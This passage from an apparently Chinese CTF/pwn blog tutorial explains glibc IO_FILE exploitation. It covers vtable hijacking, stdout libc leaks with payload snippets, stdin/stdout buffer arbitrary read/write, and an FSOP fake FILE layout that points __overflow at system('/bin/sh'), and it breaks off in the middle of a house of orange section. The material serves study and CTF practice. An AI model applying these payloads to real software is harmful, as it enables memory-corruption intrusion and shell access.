<li>vtable中的<code>_IO_new_file_overflow</code>函数调用了vtable的<code>_IO_file_doallocate</code>以初始化输入缓冲区。</li>
<li>vtable中的<code>_IO_file_doallocate</code>调用了vtable中的<code>__GI__IO_file_stat</code>以获取文件信息。</li>
<li><code>new_do_write</code>中的<code>_IO_SYSWRITE</code>调用了vtable<code>_IO_new_file_write</code>最终去执行系统调用write。</li>
</ul>
<p>fclose 函数调用的vtable函数有：</p>
<ul>
<li>在清空缓冲区的<code>_IO_do_write</code>函数中会调用vtable中的函数。</li>
<li>关闭文件描述符<code>_IO_SYSCLOSE</code>函数为vtable中的<code>__close</code>函数。</li>
<li><code>_IO_FINISH</code>函数为vtable中的<code>__finish</code>函数。</li>
</ul>
<ul>
<li>printf/puts 最终会调用_IO_file_xsputn</li>
<li>fclose 最终会调用_IO_FILE_FINISH</li>
<li>fwrite最终会调用_IO_file_xsputn</li>
<li>fread 最终会调用_IO_file_xsgetn</li>
<li>scanf/gets最终会调用_IO_file_xsgetn</li>
</ul>
<h4 id="方式一、劫持vtable"><a href="#方式一、劫持vtable" class="headerlink" title="方式一、劫持vtable"></a>方式一、劫持vtable</h4><p><img   class="lazyload" data-original="/2021/11/06/2021-11-06-IO-FLIE/image-20211111215424904.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20211111215424904</span></p>
<p>在调用 fclose 关闭一个文件时，最终会调用到 vtable 中存储的函数指针。如果我们能够将 vtable 中的指针替换为我们自己想要跳转到的地址就可以劫持程序流程。</p>
<p>覆盖 vtable 指针指向可控内存，将 __finish(off=2*SIZE_T) 构造为要执行的地址。然后调用 fclose</p>
<p>2.23及以前可用，后面的版本会检查 vtable 的合法性。</p>
<h4 id="方式二、伪造vtable"><a href="#方式二、伪造vtable" class="headerlink" title="方式二、伪造vtable"></a>方式二、伪造vtable</h4><p><img   class="lazyload" data-original="/2021/11/06/2021-11-06-IO-FLIE/image-20211111215424904.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20211111215424904</span></p>
<p>当无法直接修改 vtable 指针时，却可以修改返回的文件指针 fp。这时候就要伪造整个 FILE 结构体通过检查，再在伪造的 FILE 结构里面修改 vtable 指针以及 __finish(off=2*SIZE_T)。将文件指针指向这个伪造的 FILE 结构体，最后调用 fclose</p>
<h3 id="三、利用stdout泄露libc"><a href="#三、利用stdout泄露libc" class="headerlink" title="三、利用stdout泄露libc"></a>三、利用stdout泄露libc</h3><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-class"><span class="hljs-keyword">struct</span> _<span class="hljs-title">IO_FILE</span> &#123;</span><br>  <span class="hljs-keyword">int</span> _flags;            <span class="hljs-comment">// 文件标志，简单的说：像puts一类的输入输出函数要想正确的打印信息就需要正确设置该字段</span><br>  <span class="hljs-keyword">char</span>* _IO_read_ptr;    <span class="hljs-comment">/* Current read pointer */</span><br>  <span class="hljs-keyword">char</span>* _IO_read_end;    <span class="hljs-comment">/* End of get area. */</span><br>  <span class="hljs-keyword">char</span>* _IO_read_base;    <span class="hljs-comment">/* Start of putback+get area. */</span><br>  <span class="hljs-keyword">char</span>* _IO_write_base;    <span class="hljs-comment">/* Start of put area. */</span><br>  <span class="hljs-keyword">char</span>* _IO_write_ptr;    <span class="hljs-comment">/* Current put pointer. */</span><br>  <span class="hljs-keyword">char</span>* _IO_write_end;    <span class="hljs-comment">/* End of put area. */</span><br>......<br>......<br>&#125;<br></code></pre></td></tr></table></figure>

<p>这个利用方法较为常见，一般在没有打印函数时，用于泄露libc。将堆块分配到<code>stdout</code>指针处存储的<code>_IO_2_1_stdout_</code>该IO_FILE结构体处，修改其<code>_flags</code>为合法的数值，将后面三个 read 指针置空，将<code>_IO_write_base</code>处的第一个字节改小，后面的<code>_IO_write_ptr</code>和<code>_IO_write_end</code>保持不变。之后当程序遇到puts函数时就会打印<code>_IO_write_base</code>到<code>_IO_write_ptr</code>之间的内容</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs python">payload = p64(<span class="hljs-number">0xfbad1800</span>) + p64(<span class="hljs-number">0</span>)*<span class="hljs-number">3</span> + <span class="hljs-string">&#x27;\x00&#x27;</span><br>libc_base = libc - libc.sym[<span class="hljs-string">&quot;_IO_file_jumps&quot;</span>]<br></code></pre></td></tr></table></figure>

<p>这样泄露出来的第一个地址将会是<code>_IO_file_jumps</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs python">payload = p64(<span class="hljs-number">0xfbad3887</span>) + p64(<span class="hljs-number">0</span>)*<span class="hljs-number">3</span> + <span class="hljs-string">&#x27;\x00&#x27;</span><br>libc_base = libc - libc.sym[<span class="hljs-string">&quot;_IO_2_1_stdin_&quot;</span>]<br></code></pre></td></tr></table></figure>

<p>这样泄露出来的第一个地址将会是<code>_IO_2_1_stdin_</code></p>
<h3 id="四、任意读写"><a href="#四、任意读写" class="headerlink" title="四、任意读写"></a>四、任意读写</h3><p>伪造缓冲区指针，在一定的条件下可以完成任意地址的读写</p>
<ul>
<li><code>stdin</code>标准输入缓冲区进行任意地址写。</li>
<li><code>stdout</code>标准输出缓冲区进行任意地址读写.</li>
</ul>
<h4 id="stdin标准输入缓冲区进行任意地址写"><a href="#stdin标准输入缓冲区进行任意地址写" class="headerlink" title="stdin标准输入缓冲区进行任意地址写"></a><code>stdin</code>标准输入缓冲区进行任意地址写</h4><p>fread执行流程：</p>
<ol>
<li>判断<code>fp-&gt;_IO_buf_base</code>缓冲区是否为空，如果为空则调用的<code>_IO_doallocbuf</code>去初始化缓冲区。</li>
<li>在分配完缓冲区或缓冲区不为空的情况下，判断输入缓冲区是否存在数据。</li>
<li>如果输入缓冲区有数据则直接拷贝至用户缓冲区，如果没有或不够则调用<code>__underflow</code>函数执行系统调用读取数据到输入缓冲区，再拷贝到用户缓冲区。</li>
</ol>
<p><img   class="lazyload" data-original="/2021/11/06/2021-11-06-IO-FLIE/image-20220320095647747.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20220320095647747</span></p>
<p>如果我们能控制缓冲区指针，使得缓冲区指向想要写的地址，那么在第三步执行系统调用读取数据到缓冲区的时候，就是执行系统调用读取数据到我们想要写的地址，从而实现任意地址写的目的。</p>
<p>具体需要满足的条件，还需要对源码进行深入的分析。</p>
<p>fread关键源码：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><code class="hljs c">IO_size_t<br>_IO_file_xsgetn (_IO_FILE *fp, <span class="hljs-keyword">void</span> *data, _IO_size_t n)<br>&#123;<br> ...<br>  <span class="hljs-keyword">if</span> (fp-&gt;_IO_buf_base == <span class="hljs-literal">NULL</span>)<br>    &#123;<br>      ...<br>      <span class="hljs-comment">//缓冲区为空则调用_IO_doallocbuf初始化缓冲区</span><br>    &#125;<br><br>  <span class="hljs-keyword">while</span> (want &gt; <span class="hljs-number">0</span>)<br>    &#123;<br><br>      have = fp-&gt;_IO_read_end - fp-&gt;_IO_read_ptr;<br>      <br>      <span class="hljs-keyword">if</span> (have &gt; <span class="hljs-number">0</span>) <br>        &#123;<br>          ...<br>          <span class="hljs-comment">//memcpy</span><br>          <br>        &#125;<br><br>      <span class="hljs-keyword">if</span> (fp-&gt;_IO_buf_base<br>          &amp;&amp; want &lt; (<span class="hljs-keyword">size_t</span>) (fp-&gt;_IO_buf_end - fp-&gt;_IO_buf_base))<br>        &#123;<br>          <span class="hljs-keyword">if</span> (__underflow (fp) == EOF)  <span class="hljs-comment">//调用__underflow读入数据</span><br>      ...<br>        &#125;<br>      ...<br>  <span class="hljs-keyword">return</span> n - want;<br>&#125;<br></code></pre></td></tr></table></figure>

<p><code>_IO_file_xsgetn</code>函数会先判断输入缓冲区<code>_IO_buf_base</code>是否为空，如果为空的话则调用<code>_IO_doallocbuf</code>初始化缓冲区，因此需要构造<code>_IO_buf_base</code>不为空。</p>
<p>接着当输入缓冲区有剩余时即<code>_IO_read_end -_IO_read_ptr &gt;0</code>，会将缓冲区中的数据拷贝至目标中，因此想要利用输入缓冲区实现读写，<code>_IO_read_end -_IO_read_ptr =0</code>即<code>_IO_read_end ==_IO_read_ptr</code>。</p>
<p>同时还要求读入的数据<code>size</code>要小于缓冲区数据的大小，调用<code>__underflow</code>去读取数据，否则为提高效率会调用read直接读。</p>
<p><code>__underflow</code> 源码如下：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-keyword">int</span><br>_IO_new_file_underflow (_IO_FILE *fp)<br>&#123;<br>  _IO_ssize_t count;<br>  ...<br>  ## 如果存在_IO_NO_READS标志，则直接返回<br>  <span class="hljs-keyword">if</span> (fp-&gt;_flags &amp; _IO_NO_READS)<br>    &#123;<br>      fp-&gt;_flags |= _IO_ERR_SEEN;<br>      __set_errno (EBADF);<br>      <span class="hljs-keyword">return</span> EOF;<br>    &#125;<br>  ## 如果输入缓冲区里存在数据，则直接返回<br>  <span class="hljs-keyword">if</span> (fp-&gt;_IO_read_ptr &lt; fp-&gt;_IO_read_end)<br>    <span class="hljs-keyword">return</span> *(<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">char</span> *) fp-&gt;_IO_read_ptr;<br>  ...<br><br>  ##调用_IO_SYSREAD函数最终执行系统调用读取数据<br>  count = _IO_SYSREAD (fp, fp-&gt;_IO_buf_base,<br>               fp-&gt;_IO_buf_end - fp-&gt;_IO_buf_base);<br>  ...<br><br>&#125;<br>libc_hidden_ver (_IO_new_file_underflow, _IO_file_underflow)<br></code></pre></td></tr></table></figure>

<p>在<code>_IO_new_file_underflow</code>中函数会检查<code>_flags</code>是否包含<code>_IO_NO_READS</code>标志，包含则直接返回。标志定义<code>#define _IO_NO_READS 4</code>，因此<code>_flags</code>不能包含<code>4</code>。</p>
<p>接着判断<code>fp-&gt;_IO_read_ptr &lt; fp-&gt;_IO_read_end</code>是否成立，成立则直接返回，因此再次要求伪造的结构体<code>_IO_read_end ==_IO_read_ptr</code>，绕过该条件检查。</p>
<p>最终系统调用<code>_IO_SYSREAD (fp, fp-&gt;_IO_buf_base,fp-&gt;_IO_buf_end - fp-&gt;_IO_buf_base)</code>读取数据。因此要想利用<code>stdin</code>输入缓冲区，需设置FILE结构体中<code>_IO_buf_base</code>为想要写入数据的起始地址，<code>_IO_buf_end</code>为结束地址。同时也需将结构体中的<code>fp-&gt;_fileno</code>设置为0，最终调用<code>read (fp-&gt;_fileno, buf, size))</code>读取数据。</p>
<p>将上述条件综合表述为：</p>
<ol>
<li>设置<code>_IO_read_end</code>等于<code>_IO_read_ptr</code>。</li>
<li>设置<code>_flag &amp;~ _IO_NO_READS</code>即<code>_flag &amp;~ 0x4</code>。</li>
<li>设置<code>_fileno</code>为0。</li>
<li>设置<code>_IO_buf_base</code>为起始地址，<code>_IO_buf_end</code>为结束地址；且使得<code>_IO_buf_end-_IO_buf_base</code>大于要读的数据。</li>
</ol>
<p>似乎不一定要是 stdin，拓展到某个 fp 指针，能够劫持该 fp 对应IO_FILE结构体，进行上述设置，也是一样的任意写，但是细想似乎会存在一些问题，具体能不能实现，还是需要实践，希望之后有空实践一下，回来填补。</p>
<h2 id="stdout标准输入缓冲区进行任意地址读写"><a href="#stdout标准输入缓冲区进行任意地址读写" class="headerlink" title="stdout标准输入缓冲区进行任意地址读写"></a><code>stdout</code>标准输入缓冲区进行任意地址读写</h2><p><code>stdout</code>会将数据拷贝至输出缓冲区，并将输出缓冲区中的数据输出出来，所以如果可控<code>stdout</code>结构体，通过构造可实现利用其进行任意地址读以及任意地址写，比控制<code>stdin</code>更强大。</p>
<h3 id="任意写"><a href="#任意写" class="headerlink" title="任意写"></a>任意写</h3><p> 先看下 fwrite 源码：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs c"><br>_IO_size_t<br>_IO_new_file_xsputn (_IO_FILE *f, <span class="hljs-keyword">const</span> <span class="hljs-keyword">void</span> *data, _IO_size_t n)<br>&#123; <br>...<br>    ## 判断输出缓冲区还有多少空间<br>    <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (f-&gt;_IO_write_end &gt; f-&gt;_IO_write_ptr)<br>    count = f-&gt;_IO_write_end - f-&gt;_IO_write_ptr; <span class="hljs-comment">/* Space available. */</span><br><br>  ## 如果输出缓冲区有空间，则先把数据拷贝至输出缓冲区<br>  <span class="hljs-keyword">if</span> (count &gt; <span class="hljs-number">0</span>)<br>    &#123;<br>    ...<br>      <span class="hljs-built_in">memcpy</span> (f-&gt;_IO_write_ptr, s, count);<br></code></pre></td></tr></table></figure>

<p>任意写功能的实现在于缓冲区没有满时，会先将要输出的数据复制到缓冲区中，可通过这一点来实现任意地址写的功能。</p>
<p>可以看到，任意写的实现很简单，只需将<code>_IO_write_ptr</code>指向我们要写的位置，<code>_IO_write_end</code>指写入位置的末尾处即可。</p>
<ul>
<li><code>_IO_write_ptr</code>指向写入位置的起始处</li>
<li><code>_IO_write_end</code>指向写入位置的末尾处</li>
</ul>
<h3 id="任意读"><a href="#任意读" class="headerlink" title="任意读"></a>任意读</h3><p>仍然是查看 fwrite 关键源码：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><code class="hljs c">_IO_size_t<br>_IO_new_file_xsputn (_IO_FILE *f, <span class="hljs-keyword">const</span> <span class="hljs-keyword">void</span> *data, _IO_size_t n)<br>&#123; <br><br>    _IO_size_t count = <span class="hljs-number">0</span>;<br>...<br>    ## 判断输出缓冲区还有多少空间<br>    <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (f-&gt;_IO_write_end &gt; f-&gt;_IO_write_ptr)<br>    count = f-&gt;_IO_write_end - f-&gt;_IO_write_ptr; <span class="hljs-comment">/* Space available. */</span><br><br>  ## 如果输出缓冲区有空间，则先把数据拷贝至输出缓冲区<br>  <span class="hljs-keyword">if</span> (count &gt; <span class="hljs-number">0</span>)<br>    &#123;    <br>    ...<br>    <span class="hljs-comment">//memcpy</span><br>    &#125;<br>    <span class="hljs-keyword">if</span> (to_do + must_flush &gt; <span class="hljs-number">0</span>)<br>    &#123;<br>      <span class="hljs-keyword">if</span> (_IO_OVERFLOW (f, EOF) == EOF)<br></code></pre></td></tr></table></figure>

<p>当<code>f-&gt;_IO_write_end &gt; f-&gt;_IO_write_ptr</code>时才会触发后续操作，所以此为一个条件。</p>
<p>接着看 _IO_OVERFLOW 的关键源码：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-keyword">int</span><br>_IO_new_file_overflow (_IO_FILE *f, <span class="hljs-keyword">int</span> ch)<br>&#123;<br>  ## 判断标志位是否包含<span class="hljs-function">_IO_NO_WRITES</span><br><span class="hljs-function">  <span class="hljs-title">if</span> <span class="hljs-params">(f-&gt;_flags &amp; _IO_NO_WRITES)</span> <span class="hljs-comment">/* SET ERROR */</span></span><br><span class="hljs-function">    </span>&#123;<br>      f-&gt;_flags |= _IO_ERR_SEEN;<br>      __set_errno (EBADF);<br>      <span class="hljs-keyword">return</span> EOF;<br>    &#125;<br><br>  ## 判断输出缓冲区是否为空<br>  <span class="hljs-keyword">if</span> ((f-&gt;_flags &amp; _IO_CURRENTLY_PUTTING) == <span class="hljs-number">0</span> || f-&gt;_IO_write_base == <span class="hljs-literal">NULL</span>)<br>    &#123;<br>      ...<br>    &#125;<br><br>  ## 输出输出缓冲区 <br>  <span class="hljs-keyword">if</span> (ch == EOF)<br>    <span class="hljs-keyword">return</span> _IO_do_write (f, f-&gt;_IO_write_base,<br>             f-&gt;_IO_write_ptr - f-&gt;_IO_write_base);<br>  <span class="hljs-keyword">return</span> (<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">char</span>) ch;<br>&#125;<br>libc_hidden_ver (_IO_new_file_overflow, _IO_file_overflow)<br></code></pre></td></tr></table></figure>

<p>首先判断<code>_flags</code>是否包含<code>_IO_NO_WRITES</code>，如果包含则直接返回，因此需构造<code>_flags</code>不包含<code>_IO_NO_WRITES</code>，其定义为<code>#define _IO_NO_WRITES 8</code>。</p>
<p>接着判断缓冲区是否为空以及是否包含<code>_IO_CURRENTLY_PUTTING</code>标志位，应当使得判断为假，因次让<code>_flags</code>包含<code>_IO_CURRENTLY_PUTTING</code>，其定义为<code>#define _IO_CURRENTLY_PUTTING 0x800</code>。</p>
<p>接着调用<code>_IO_do_write</code>去输出输出缓冲区，其传入的参数是<code>f-&gt;_IO_write_base</code>，大小为<code>f-&gt;_IO_write_ptr - f-&gt;_IO_write_base</code>。因此若想实现任意地址读，应构造<code>_IO_write_base</code>为<code>read_start</code>，构造<code>_IO_write_ptr</code>为<code>read_end</code>。</p>
<p>接着查看 _IO_do_write 关键源码：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-function"><span class="hljs-keyword">static</span></span><br><span class="hljs-function">_IO_size_t</span><br><span class="hljs-function"><span class="hljs-title">new_do_write</span> <span class="hljs-params">(_IO_FILE *fp, <span class="hljs-keyword">const</span> <span class="hljs-keyword">char</span> *data, _IO_size_t to_do)</span></span><br><span class="hljs-function"></span>&#123;<br>  ...<br>  _IO_size_t count;<br>  <span class="hljs-keyword">if</span> (fp-&gt;_flags &amp; _IO_IS_APPENDING)<br>    fp-&gt;_offset = _IO_pos_BAD;<br>  <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (fp-&gt;_IO_read_end != fp-&gt;_IO_write_base)<br>    &#123;<br>      _IO_off64_t new_pos<br>    = _IO_SYSSEEK (fp, fp-&gt;_IO_write_base - fp-&gt;_IO_read_end, <span class="hljs-number">1</span>);<br>      <span class="hljs-keyword">if</span> (new_pos == _IO_pos_BAD)<br>    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>      fp-&gt;_offset = new_pos;<br>    &#125;<br>  ## 调用函数输出输出缓冲区<br>  count = _IO_SYSWRITE (fp, data, to_do);<br>  ...<br>  <br>  <span class="hljs-keyword">return</span> count;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>在调用<code>_IO_SYSWRITE</code>之前还判断了<code>fp-&gt;_IO_read_end != fp-&gt;_IO_write_base</code>，因此需要构造结构体使得<code>_IO_read_end</code>等于<code>_IO_write_base</code>，或者构造<code>_flags</code>包含<code>_IO_IS_APPENDING</code>，<code>_IO_IS_APPENDING</code>的定义为<code>#define _IO_IS_APPENDING 0x1000</code>。</p>
<p>最后<code>_IO_SYSWRITE</code>调用<code>write (f-&gt;_fileno, data, to_do)</code>输出数据，因此还需构造<code>_fileno</code>为标准输出描述符1。</p>
<p>总结为： </p>
<ol>
<li>设置<code>_flag &amp;~ _IO_NO_WRITES</code>即<code>_flag &amp;~ 0x8</code>。</li>
<li>设置<code>_flag &amp; _IO_CURRENTLY_PUTTING</code>即<code>_flag | 0x800</code></li>
<li>设置<code>_fileno</code>为1。</li>
<li>设置<code>_IO_write_base</code>指向想要泄露的地方；<code>_IO_write_ptr</code>指向泄露结束的地址。</li>
<li>设置<code>_IO_read_end</code>等于<code>_IO_write_base</code>或设置<code>_flag &amp; _IO_IS_APPENDING</code>即<code>_flag | 0x1000</code>。</li>
<li>设置<code>_IO_write_end</code>等于<code>_IO_write_ptr</code>（非必须）。</li>
</ol>
<p>这个就是前面利用 stdout 泄露 libc 的原理，按照前面说的进行布局，适用性更广。</p>
<h3 id="五、FSOP"><a href="#五、FSOP" class="headerlink" title="五、FSOP"></a>五、FSOP</h3><p>FSOP（ File Stream Oriented Programming ），是一种劫持<code>_IO_list_all</code>来伪造文件流对象链表的利用技术，通过调用<code>_IO_flush_all_lockp</code>函数触发。该函数会在下面三种情况下被调用：</p>
<ol>
<li>libc 检测到内存错误从而执行 abort 流程时</li>
<li>执行 exit 函数时</li>
<li>main 函数返回时</li>
</ol>
<p>一般在pwn题中，我们都是构造内存错误(例如double free漏洞可以触发)，此时会产生一系列的函数调用路径，最终的调用为：<code>_IO_flush_all_lockp</code> –&gt; <code>_IO_OVERFLOW</code>，而这里的<code>_IO_OVERFLOW</code>就是文件流对象虚表的第四项指向的内容<code>_IO_new_file_overflow</code>，如下图所示</p>
<p><img   class="lazyload" data-original="/2021/11/06/2021-11-06-IO-FLIE/image-20211122204732406-16375881553361.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20211122204732406</span></p>
<p>构造方式：首先需要将<code>_IO_list_all</code>的<code>_chain</code>指针指向伪造的堆块；然后伪造堆块的内容布局如下：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><code class="hljs c"># 设 chunk_addr<br>&#123;<br>  file = &#123;<br>    _flags = <span class="hljs-string">&quot;/bin/sh\x00&quot;</span>, <span class="hljs-meta"># binsh 字符串     chunk_addr + 0x0</span><br>    _IO_read_ptr = <span class="hljs-number">0x0</span>,<br>    _IO_read_end = <span class="hljs-number">0x0</span>,<br>    _IO_read_base = <span class="hljs-number">0x0</span>,<br>    _IO_write_base = <span class="hljs-number">0x0</span>,   #                  chunk_addr + <span class="hljs-number">0x20</span><br>    _IO_write_ptr = <span class="hljs-number">0x1</span>,    # 保证 ptr &gt; base  chunk_addr + <span class="hljs-number">0x28</span><br>  	...<br>  	...<br>  &#125;,                        # vtable_addr = chunk_addr + <span class="hljs-number">0xd8</span><br>  vtable = heap_addr        # 堆上另一个可控地址 heap_addr = chunk_addr + <span class="hljs-number">0xe0</span><br>&#125;<br><br>heap_addr &#123;<br>  __dummy = <span class="hljs-number">0x0</span>,<br>  __dummy2 = <span class="hljs-number">0x0</span>,<br>  __finish = <span class="hljs-number">0x0</span>,<br>  __overflow = system,      # _IO_OVERFLOW 覆盖为 system 的地址，其第一个参数就是chunk_addr <br>    ...                     # 因此这样构造我们就实现了 system(<span class="hljs-string">&quot;/bin/sh\x00&quot;</span>)<br>	...<br>&#125;<br><br></code></pre></td></tr></table></figure>

<h4 id="house-of-orange"><a href="#house-of-orange" class="headerlink" title="house of orange"></a>house of orange</h4><p>著名手法，在glibc-2.24及以下可以使用，unsorted bin attack 加上 FSOP 的结合。</p>
<p>先介绍一下原理：</p>
<p>如果在分配堆块时， top chunk 不够分配，那么根据申请的大小，会通过sysmalloc 来分配，如果申请的大小小于mmap的阀值（默认为 128K，0x20000），就会扩展top chunk，将old top chunk free掉，如果大于的话，就会通过mmap申请一块新的堆块。所以可以通过把 top chunk size 改小这种方式让 top chunk 进入unsorted bin 中，从而产生 libc 地址。</p>
<p>要求：</p>
<ul>
<li>size需要大于0x20（MINSIZE）</li>
<li>prev_inuse位要为1</li>
<li>top chunk address + top chunk size 必须是页对齐的（页大小为0x1000）</li>
</ul>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-keyword">if</span> (av == <span class="hljs-literal">NULL</span><br>    || ((<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">long</span>) (nb) &gt;= (<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">long</span>) (mp_.mmap_threshold)<br>        &amp;&amp; (mp_.n_mmaps &lt; mp_.n_mmaps_max)))<span class="hljs-comment">/*这里进行判断，判断分配的大小是否大于mmap分配的阀值，如果大于就是用mmap从新分配一个堆块，否则就会扩展top chunk*/</span><br>  &#123;<br>    <span class="hljs-keyword">char</span> *mm;           <span class="hljs-comment">/* return value from mmap call*/</span><br>  try_mmap:<br>  <br>  .........<br>  ..........<br>    <span class="hljs-keyword">if</span> (old_size != <span class="hljs-number">0</span>)<br>                  &#123;<br>                    <span class="hljs-comment">/*</span><br><span class="hljs-comment">                       Shrink old_top to insert fenceposts, keeping size a</span><br><span class="hljs-comment">                       multiple of MALLOC_ALIGNMENT. We know there is at least</span><br><span class="hljs-comment">                       enough space in old_top to do this.</span><br><span class="hljs-comment">                     */</span><br>                    old_size = (old_size - <span class="hljs-number">4</span> * SIZE_SZ) &amp; ~MALLOC_ALIGN_MASK;<br>                    set_head (old_top, old_size | PREV_INUSE);<br>                    set_head (chunk_at_offset (old_top, old_size),<br>                              (<span class="hljs-number">2</span> * SIZE_SZ) | PREV_INUSE);<br>                    set_head (chunk_at_offset (old_top, old_size + <span class="hljs-number">2</span> * SIZE_SZ),<br>                              (<span class="hljs-number">2</span> * SIZE_SZ) | PREV_INUSE);<br>                    <span class="hljs-comment">/* If possible, release the rest. */</span><br>                    <span class="hljs-keyword">if</span> (old_size &gt;= MINSIZE)<br>                      &#123;<br>                        _int_free (av, old_top, <span class="hljs-number">1</span>);<span class="hljs-comment">/*将old top chunk free掉，加入unsorted bin*/</span><br>                      &#125;<br>                  